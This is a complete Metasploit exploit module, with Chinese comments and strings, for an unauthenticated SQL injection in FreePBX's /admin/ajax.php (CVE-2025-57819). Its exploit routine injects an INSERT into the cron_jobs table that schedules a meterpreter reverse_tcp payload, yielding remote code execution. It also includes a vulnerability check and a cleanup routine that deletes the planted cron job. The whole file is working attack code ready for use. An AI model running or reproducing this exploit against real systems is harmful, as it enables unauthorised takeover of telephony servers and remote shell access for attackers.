1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
|
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'FreePBX ajax.php unuthenticated SQLi to RCE',
'Description' => %q{
该模块利用FreePBX中未授权的SQL注入漏洞。漏洞位于/admin/ajax.php端点,
无需认证即可访问。FreePBX创建的数据库用户可调度cronjob,从而在目标系统上实现远程代码执行。
},
'License' => MSF_LICENSE,
'Author' => [
'Echo_Slow', # msf模块
'Piotr Bazydlo', # 用作模板的POC
'Sonny' # 用作模板的POC
],
'References' => [
['CVE', '2025-57819'],
['URL', 'https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/']
],
'Platform' => ['linux'],
'Arch' => ARCH_CMD,
'Targets' => [
[
'Unix Command',
{
'DefaultOptions' =>
{
'Payload' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
'WfsDelay' => 70 # cronjob可能需最多一分钟启动
}
}
]
],
'Privileged' => false,
'DisclosureDate' => '2025-08-28',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [false, 'FreePBX安装路径', '/'])
])
end
def check
print_status('检查漏洞是否存在...')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
'vars_get' => {
'module' => 'FreePBX\\modules\\endpoint\\ajax',
'command' => 'model',
'template' => Rex::Text.rand_text_alphanumeric(3..6),
'model' => Rex::Text.rand_text_alphanumeric(3..6),
'brand' => "#{Rex::Text.rand_text_alphanumeric(3..6)}'"
}
)
if res&.code == 500 && res.body =~ /You have an error in your SQL syntax/
return Exploit::CheckCode::Vulnerable('检测到SQL注入')
end
Exploit::CheckCode::Safe('未检测到SQL注入,目标已修复')
end
def exploit
module_name = Rex::Text.rand_text_alpha(4..7)
@job_name = Rex::Text.rand_text_alpha(4..7)
rce_payload = Rex::Text.rand_text_alpha(4..7)
rce_payload << "';INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)"
rce_payload << " VALUES ('#{module_name}','#{@job_name}','#{payload.encoded}',NULL,'* * * * *',30,1,1) -- "
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
'vars_get' => {
'module' => 'FreePBX\\modules\\endpoint\\ajax',
'command' => 'model',
'template' => Rex::Text.rand_text_alphanumeric(3..6),
'model' => Rex::Text.rand_text_alphanumeric(3..6),
'brand' => rce_payload
}
)
if res&.code == 500 && res.body =~ /Trying to access array offset on value of type bool/
print_good("已创建cronjob,任务名:'#{@job_name}'")
print_status('等待cronjob触发...')
else
fail_with(Failure::PayloadFailed, 'Cronjob创建失败')
end
end
def cleanup
super
return unless @job_name
# 清理创建的cronjob
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
'vars_get' => {
'module' => 'FreePBX\\modules\\endpoint\\ajax',
'command' => 'model',
'template' => Rex::Text.rand_text_alphanumeric(3..6),
'model' => Rex::Text.rand_text_alphanumeric(3..6),
'brand' => "'; DELETE FROM cron_jobs WHERE jobname=\'#{@job_name}\' -- "
}
)
print_status('尝试执行清理操作')
if res&.code == 500 && res.body =~ /Trying to access array offset on value of type bool/
print_good('Cronjob已移除,黑客愉快!')
else
print_bad('Cronjob移除失败,请手动清理!')
end
end
end
|